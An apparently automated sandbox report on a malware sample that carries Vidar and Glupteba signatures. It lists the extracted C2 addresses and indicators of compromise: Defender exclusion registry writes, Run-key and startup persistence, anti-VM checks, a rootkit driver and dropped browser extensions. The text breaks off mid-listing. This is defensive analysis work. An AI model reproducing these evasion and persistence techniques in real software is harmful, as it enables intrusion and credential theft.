Analysis
-
max time kernel
299s -
max time network
303s -
platform
windows10-1703_x64 -
resource
win10-20231020-en -
resource tags
arch:x64arch:x86image:win10-20231020-enlocale:en-usos:windows10-1703-x64system -
submitted
22-10-2023 22:21
Static task
static1
Behavioral task
behavioral1
Sample
85c7ebf244cb05f624baea0b1526c57ba3ecaa05583c27fe814217f9ffbf020c.exe
Resource
win7-20230831-en
General
-
Target
85c7ebf244cb05f624baea0b1526c57ba3ecaa05583c27fe814217f9ffbf020c.exe
-
Size
1.7MB
-
MD5
a67b49df2160d1251ad1ee874d15f078
-
SHA1
6fa51a0a8692ee0d363da5751990f3b4e64e6262
-
SHA256
85c7ebf244cb05f624baea0b1526c57ba3ecaa05583c27fe814217f9ffbf020c
-
SHA512
a06fcd19066c0cd300fc19c873fc050e906563f02c308da835e36c749c5623fb26ae0f074f827090c041a89f17199d2249246a10f2aed54ed9855913568460f8
-
SSDEEP
24576:c+MOMrtZe51jnh98WLAcinXpRUEPR7MZPQeEt5BQcuCUrKhb:6OMrzKhbyi8PUWd
Malware Config
Extracted
vidar
6.1
af2b108237a470d5313ebab11ef5d055
https://steamcommunity.com/profiles/76561199563297648
https://t.me/twowheelfun
-
profile_id_v2
af2b108237a470d5313ebab11ef5d055
-
user_agent
Mozilla/5.0 (iPad; CPU OS 17_0_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Mobile/15E148 Safari/605.1.15
Signatures
-
Glupteba payload 12 IoCs
resource yara_rule behavioral2/memory/4704-107-0x0000000002F30000-0x000000000381B000-memory.dmp family_glupteba behavioral2/memory/4704-109-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba behavioral2/memory/1124-114-0x0000000002D50000-0x000000000363B000-memory.dmp family_glupteba behavioral2/memory/1124-125-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba behavioral2/memory/4704-158-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba behavioral2/memory/1124-167-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba behavioral2/memory/4704-200-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba behavioral2/memory/1124-203-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba behavioral2/memory/4704-220-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba behavioral2/memory/1124-221-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba behavioral2/memory/4704-237-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba behavioral2/memory/1124-242-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba -
Suspicious use of NtCreateUserProcessOtherParentProcess 12 IoCs
description pid Process procid_target PID 4544 created 3116 4544 Qw369efixtIBKFp9ZFZ0w0mq.exe 52 PID 4544 created 3116 4544 Qw369efixtIBKFp9ZFZ0w0mq.exe 52 PID 4544 created 3116 4544 Qw369efixtIBKFp9ZFZ0w0mq.exe 52 PID 4544 created 3116 4544 Qw369efixtIBKFp9ZFZ0w0mq.exe 52 PID 4544 created 3116 4544 Qw369efixtIBKFp9ZFZ0w0mq.exe 52 PID 4544 created 3116 4544 Qw369efixtIBKFp9ZFZ0w0mq.exe 52 PID 4372 created 3116 4372 updater.exe 52 PID 4372 created 3116 4372 updater.exe 52 PID 4372 created 3116 4372 updater.exe 52 PID 4372 created 3116 4372 updater.exe 52 PID 4372 created 3116 4372 updater.exe 52 PID 4372 created 3116 4372 updater.exe 52 -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\FcrfIQnc3MnN2EYixmyTFb6D.exe = "0" cmd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" ZWaNCawf3dZ4eT3o5QvqYRLW.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" ZWaNCawf3dZ4eT3o5QvqYRLW.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" ZWaNCawf3dZ4eT3o5QvqYRLW.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" ZWaNCawf3dZ4eT3o5QvqYRLW.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" ZWaNCawf3dZ4eT3o5QvqYRLW.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" ZWaNCawf3dZ4eT3o5QvqYRLW.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\ZWaNCawf3dZ4eT3o5QvqYRLW.exe = "0" ZWaNCawf3dZ4eT3o5QvqYRLW.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts Qw369efixtIBKFp9ZFZ0w0mq.exe File created C:\Windows\System32\drivers\etc\hosts updater.exe -
Modifies Windows Firewall 1 TTPs 2 IoCs
pid Process 3016 netsh.exe 8 netsh.exe -
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion sc.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2640874492-649017405-3475600720-1000\Control Panel\International\Geo\Nation wXyVQwS.exe -
Drops startup file 8 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Lkf1zJCsoFgH8d2hvIzEYlIN.bat InstallUtil.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\uzxOe2lyQDhSDaEfvfIKqMBD.bat InstallUtil.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OLIHzbyHLDXijHQYrzdL0a5F.bat InstallUtil.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7y4ACGRZJNzZHbKEvffh0Sns.bat InstallUtil.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4GLBGe0jt1vFHT3XxcZmkibv.bat InstallUtil.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4tQwPV659hlBHDLbTJFNn91R.bat InstallUtil.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CvsYZlzWhRJTuq9jYDiXtMI7.bat InstallUtil.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FM6vIcBAv4EjiqrmhNenpWZ7.bat InstallUtil.exe -
Executes dropped EXE 26 IoCs
pid Process 4704 ZWaNCawf3dZ4eT3o5QvqYRLW.exe 1124 FcrfIQnc3MnN2EYixmyTFb6D.exe 4544 Qw369efixtIBKFp9ZFZ0w0mq.exe 1384 mAIqaeuuMoGky7kZVzMJ1DQQ.exe 1204 zhqw0x5VEifunzipVxSGz3iI.exe 696 EWJZ39UCGs8aWbGUePjQcrz2.exe 748 zhqw0x5VEifunzipVxSGz3iI.exe 4908 zhqw0x5VEifunzipVxSGz3iI.exe 4940 zhqw0x5VEifunzipVxSGz3iI.exe 4272 zhqw0x5VEifunzipVxSGz3iI.exe 2856 NjD3wZxeeWlSx5eQJUW3XsQg.exe 2816 Install.exe 4364 Install.exe 4480 Assistant_103.0.4928.25_Setup.exe_sfx.exe 4372 updater.exe 4908 assistant_installer.exe 3648 assistant_installer.exe 4496 ZWaNCawf3dZ4eT3o5QvqYRLW.exe 4328 cmd.exe 4576 WEYFRYL.exe 2372 wXyVQwS.exe 1344 csrss.exe 4252 injector.exe 4152 windefender.exe 520 windefender.exe 2228 f801950a962ddba14caaa44bf084b55c.exe -
Loads dropped DLL 12 IoCs
pid Process 1204 zhqw0x5VEifunzipVxSGz3iI.exe 748 zhqw0x5VEifunzipVxSGz3iI.exe 4908 zhqw0x5VEifunzipVxSGz3iI.exe 4940 zhqw0x5VEifunzipVxSGz3iI.exe 4272 zhqw0x5VEifunzipVxSGz3iI.exe 696 EWJZ39UCGs8aWbGUePjQcrz2.exe 696 EWJZ39UCGs8aWbGUePjQcrz2.exe 4908 assistant_installer.exe 4908 assistant_installer.exe 3648 assistant_installer.exe 3648 assistant_installer.exe 1048 sc.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/files/0x000600000001ab9f-57.dat upx behavioral2/files/0x000600000001ab9f-58.dat upx behavioral2/files/0x000600000001ab9f-69.dat upx behavioral2/files/0x000600000001abb1-72.dat upx behavioral2/memory/748-63-0x0000000001280000-0x00000000017CD000-memory.dmp upx behavioral2/memory/1204-52-0x0000000001280000-0x00000000017CD000-memory.dmp upx behavioral2/files/0x000600000001ab9f-43.dat upx behavioral2/memory/4908-79-0x0000000000A50000-0x0000000000F9D000-memory.dmp upx behavioral2/files/0x000600000001ab9f-82.dat upx behavioral2/memory/4940-86-0x0000000001280000-0x00000000017CD000-memory.dmp upx behavioral2/files/0x000600000001ab9f-87.dat upx behavioral2/memory/4272-119-0x0000000001280000-0x00000000017CD000-memory.dmp upx behavioral2/memory/1204-173-0x0000000001280000-0x00000000017CD000-memory.dmp upx behavioral2/memory/4940-196-0x0000000001280000-0x00000000017CD000-memory.dmp upx -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" ZWaNCawf3dZ4eT3o5QvqYRLW.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" ZWaNCawf3dZ4eT3o5QvqYRLW.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" ZWaNCawf3dZ4eT3o5QvqYRLW.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\ZWaNCawf3dZ4eT3o5QvqYRLW.exe = "0" ZWaNCawf3dZ4eT3o5QvqYRLW.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\FcrfIQnc3MnN2EYixmyTFb6D.exe = "0" cmd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" ZWaNCawf3dZ4eT3o5QvqYRLW.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" ZWaNCawf3dZ4eT3o5QvqYRLW.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" ZWaNCawf3dZ4eT3o5QvqYRLW.exe -
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2640874492-649017405-3475600720-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" ZWaNCawf3dZ4eT3o5QvqYRLW.exe Set value (str) \REGISTRY\USER\S-1-5-21-2640874492-649017405-3475600720-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" cmd.exe Set value (str) \REGISTRY\USER\S-1-5-21-2640874492-649017405-3475600720-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" csrss.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json wXyVQwS.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json wXyVQwS.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini wXyVQwS.exe -
Enumerates connected drives 3 TTPs 4 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\D: zhqw0x5VEifunzipVxSGz3iI.exe File opened (read-only) \??\F: zhqw0x5VEifunzipVxSGz3iI.exe File opened (read-only) \??\D: zhqw0x5VEifunzipVxSGz3iI.exe File opened (read-only) \??\F: zhqw0x5VEifunzipVxSGz3iI.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
description ioc Process File opened for modification \??\WinMonFS csrss.exe -
Drops file in System32 directory 45 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_07142A81A102242D09FF624B465962F7 wXyVQwS.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive windefender.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData wXyVQwS.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA wXyVQwS.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA wXyVQwS.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_3177CE6CD1B3852A6EC841765B1A16FB wXyVQwS.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft wXyVQwS.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 wXyVQwS.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol wXyVQwS.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE wXyVQwS.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies wXyVQwS.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache wXyVQwS.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8C0A4A9E1CEFEB34D84E7975A8A5D28F wXyVQwS.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_3177CE6CD1B3852A6EC841765B1A16FB wXyVQwS.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_8E9F8DBF10736410A01753CD3E271280 wXyVQwS.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat sc.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol WEYFRYL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat wXyVQwS.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 wXyVQwS.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8C0A4A9E1CEFEB34D84E7975A8A5D28F wXyVQwS.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA wXyVQwS.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive Conhost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive rundll32.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content wXyVQwS.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 wXyVQwS.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_8E9F8DBF10736410A01753CD3E271280 wXyVQwS.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA wXyVQwS.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_07142A81A102242D09FF624B465962F7 wXyVQwS.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini WEYFRYL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 wXyVQwS.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 3792 set thread context of 3748 3792 85c7ebf244cb05f624baea0b1526c57ba3ecaa05583c27fe814217f9ffbf020c.exe 70 PID 4372 set thread context of 4564 4372 updater.exe 237 PID 4372 set thread context of 2532 4372 updater.exe 238 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN ZWaNCawf3dZ4eT3o5QvqYRLW.exe File opened (read-only) \??\VBoxMiniRdrDN cmd.exe -
Drops file in Program Files directory 15 IoCs
description ioc Process File created C:\Program Files (x86)\KrPQunXfXpAVC\jNcfuKN.xml wXyVQwS.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi wXyVQwS.exe File created C:\Program Files (x86)\DlbZONUGhjVU2\NnXXDql.xml wXyVQwS.exe File created C:\Program Files (x86)\oVhJPNkDU\exZibaI.xml wXyVQwS.exe File created C:\Program Files (x86)\oVhJPNkDU\kunRDm.dll wXyVQwS.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak wXyVQwS.exe File created C:\Program Files (x86)\DlbZONUGhjVU2\TkhuHnMRVDOmk.dll wXyVQwS.exe File created C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\IaNaHPT.dll wXyVQwS.exe File created C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\XdocruQ.xml wXyVQwS.exe File created C:\Program Files\Google\Chrome\updater.exe Qw369efixtIBKFp9ZFZ0w0mq.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak wXyVQwS.exe File created C:\Program Files (x86)\KrPQunXfXpAVC\wApqRvu.dll wXyVQwS.exe File created C:\Program Files (x86)\GpfcWYRxKqUn\BshyzsP.dll wXyVQwS.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi wXyVQwS.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja wXyVQwS.exe -
Drops file in Windows directory 10 IoCs
description ioc Process File created C:\Windows\Tasks\bwpFiyeZPJPVdaMxTt.job gpscript.exe File opened for modification C:\Windows\rss ZWaNCawf3dZ4eT3o5QvqYRLW.exe File created C:\Windows\Tasks\HKFMMLmWpeGdwIqGl.job schtasks.exe File opened for modification C:\Windows\windefender.exe csrss.exe File created C:\Windows\Tasks\GyWbuVQzPmDmgkCMH.job schtasks.exe File created C:\Windows\Tasks\ztlTbPYifermRZH.job schtasks.exe File created C:\Windows\rss\csrss.exe ZWaNCawf3dZ4eT3o5QvqYRLW.exe File opened for modification C:\Windows\rss cmd.exe File created C:\Windows\rss\csrss.exe cmd.exe File created C:\Windows\windefender.exe csrss.exe -
Launches sc.exe 11 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1048 sc.exe 2612 sc.exe 2780 sc.exe 2444 sc.exe 3972 sc.exe 3644 sc.exe 3264 sc.exe 4220 sc.exe 5060 sc.exe 4236 sc.exe 4204 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 EWJZ39UCGs8aWbGUePjQcrz2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EWJZ39UCGs8aWbGUePjQcrz2.exe -
Creates scheduled task(s) 1 TTPs 15 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 320 schtasks.exe 3156 schtasks.exe 3640 schtasks.exe 1836 schtasks.exe 5012 schtasks.exe 3308 schtasks.exe 4076 schtasks.exe 3504 schtasks.exe 3396 schtasks.exe 2612 schtasks.exe 3892 schtasks.exe 3492 schtasks.exe 3144 schtasks.exe 4624 schtasks.exe 4312 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4124 timeout.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS sc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName sc.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time" ZWaNCawf3dZ4eT3o5QvqYRLW.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" ZWaNCawf3dZ4eT3o5QvqYRLW.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time" ZWaNCawf3dZ4eT3o5QvqYRLW.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-172 = "Central Standard Time (Mexico)" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-932 = "Coordinated Universal Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-591 = "Malay Peninsula Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" ZWaNCawf3dZ4eT3o5QvqYRLW.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time" ZWaNCawf3dZ4eT3o5QvqYRLW.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time" ZWaNCawf3dZ4eT3o5QvqYRLW.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-501 = "Nepal Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-215 = "Pacific Standard Time (Mexico)" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time" ZWaNCawf3dZ4eT3o5QvqYRLW.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2142 = "Transbaikal Standard Time" ZWaNCawf3dZ4eT3o5QvqYRLW.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-12 = "Azores Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1831 = "Russia TZ 2 Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" rundll32.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs Conhost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2142 = "Transbaikal Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2002 = "Cabo Verde Standard Time" ZWaNCawf3dZ4eT3o5QvqYRLW.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)" ZWaNCawf3dZ4eT3o5QvqYRLW.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = 